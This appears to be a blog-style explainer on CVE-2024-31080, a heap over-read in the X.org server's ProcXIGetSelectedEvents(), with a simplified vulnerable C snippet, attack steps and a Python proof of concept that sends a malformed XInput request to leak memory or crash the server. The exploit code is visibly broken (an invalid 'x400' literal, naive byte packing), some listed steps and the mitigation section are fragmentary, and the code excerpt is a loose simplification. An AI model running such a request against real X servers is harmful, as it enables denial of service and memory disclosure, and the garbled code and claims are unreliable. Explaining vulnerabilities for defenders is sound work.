CVE-2024-31080 - Heap Memory Leak and Crash in X.org Server via ProcXIGetSelectedEvents() — Vulnerability Explained

A severe heap-based buffer over-read vulnerability, tracked as CVE-2024-31080, was recently identified in the widely used X.org X11 server. The flaw lurks within the ProcXIGetSelectedEvents() function and has significant impact—potentially allowing remote attackers to crash the X server and leak memory contents, just by sending crafted requests using a client with a different byte order (endianness) than the server. Here’s an exclusive deep dive in plain language, including code snippets and demonstration exploits.

Vulnerability Overview

Vulnerability name: Heap buffer over-read in ProcXIGetSelectedEvents()
Affected software: X.org XServer (versions before June 2024)
CVE: CVE-2024-31080

Where’s the problem?

The bug is triggered when the X server replies to specially crafted XIGetSelectedEvents requests from a client with a different byte order. It uses byte-swapped length values from the request, which are not properly validated, to calculate reply message sizes. This can cause the server to read out-of-bounds memory from the heap—sometimes massive amounts, depending on values provided—then transmit this data back to the client.

Technical Details

The vulnerable code is in the X Input Protocol extension (Xi), within the ProcXIGetSelectedEvents() function. Here’s a simplified snippet to illustrate the bug:

int ProcXIGetSelectedEvents(ClientPtr client)
{
    xXIGetSelectedEventsReply rep;
    // ...
    rep.length = /* CALCULATED LENGTH, POTENTIALLY FROM CLIENT VALUE */;
    WriteToClient(client, sizeof(xXIGetSelectedEventsReply), (char *)&rep);
    WriteToClient(client, 
                  rep.length * 4,         // <--- VULNERABLE: VALUE TRUSTED FROM CLIENT
                  (char *)events_list);
}

If the attacker sets rep.length to a large number (after byte-swapping), the WriteToClient call will try to send data beyond the actual size of events_list, causing an over-read. The data will be sent back to the client, leaking heap memory, until an unmapped page is read—causing a server crash.

Official Patch:

The issue was addressed by adding proper bounds checks before using client-supplied lengths.
See: X.org commit

Who can attack?

- Anyone with access to submit requests to the X server: This may include unprivileged local users, thin clients, or in some cases, remote clients in certain networked environments.

Send a XIGetSelectedEvents request with the byte-swapped length field set to a large value.

3. The server reads until an unmapped heap page (potential crash), and in the process, will send back chunks of heap memory to the attacker.

### Exploit code (Python, using python-xlib)
*The following is a simplified PoC idea; you need a working X11 protocol library to actually send the malformed request clearly!*

from Xlib import display, X
import struct

# WARNING: This exploit is for educational purposes
# Presenting steps only - run only in isolated environments

d = display.Display()
s = d.screen()
root = s.root

def heap_leak_xigetselectedevents():
    opcode = 127  # XInput opcode varies; set your system's
    REQ_TYPE = 43 # XIGetSelectedEvents
    length = x400  # Large value to force over-read (byte-swapped in transit)
    win_id = root.id

    # create the raw request with swapped length
    # This is a simplified example; real request needs correct byte order and opcode
    request = struct.pack('<BBHI', opcode, REQ_TYPE, length, win_id)
    d.socket.send(request)

    # Read reply (should trigger memory leak or crash)
    try:
        reply = d.socket.recv(4096)
        print("Got server reply (leaked memory):", reply)
    except Exception as e:
        print("Server may have crashed or dropped connection:", e)

heap_leak_xigetselectedevents()

> Real-life exploit implementation requires a deep understanding of the X Input Extension protocol and raw socket crafting—for demonstration, this pseudocode outlines the logic.

Risks

- Heap data leak: Attacker may obtain fragments of the server's memory (uncontrolled, but may include sensitive info).

Upgrade to the latest X.org Xserver release since June 2024.

- Apply the official patches if using a fork.

Learn More (References)

- X.org Security Advisory: X.Org Server Multiple Issues
- GitLab Patch Commit
- CVE Details entry for CVE-2024-31080
- X Input protocol reference

Conclusion

CVE-2024-31080 is a stark reminder that even mature, widely deployed software like the X.org X server can harbor dangerous vulnerabilities in less-audited protocol corner cases. Anyone operating multi-user or remote-access X11 environments should apply the fix immediately. Regularly update critical infrastructure and limit network exposure for sensitive servers.

Timeline

Published on: 04/04/2024 14:15:10 UTC
Last modified on: 04/29/2024 19:15:20 UTC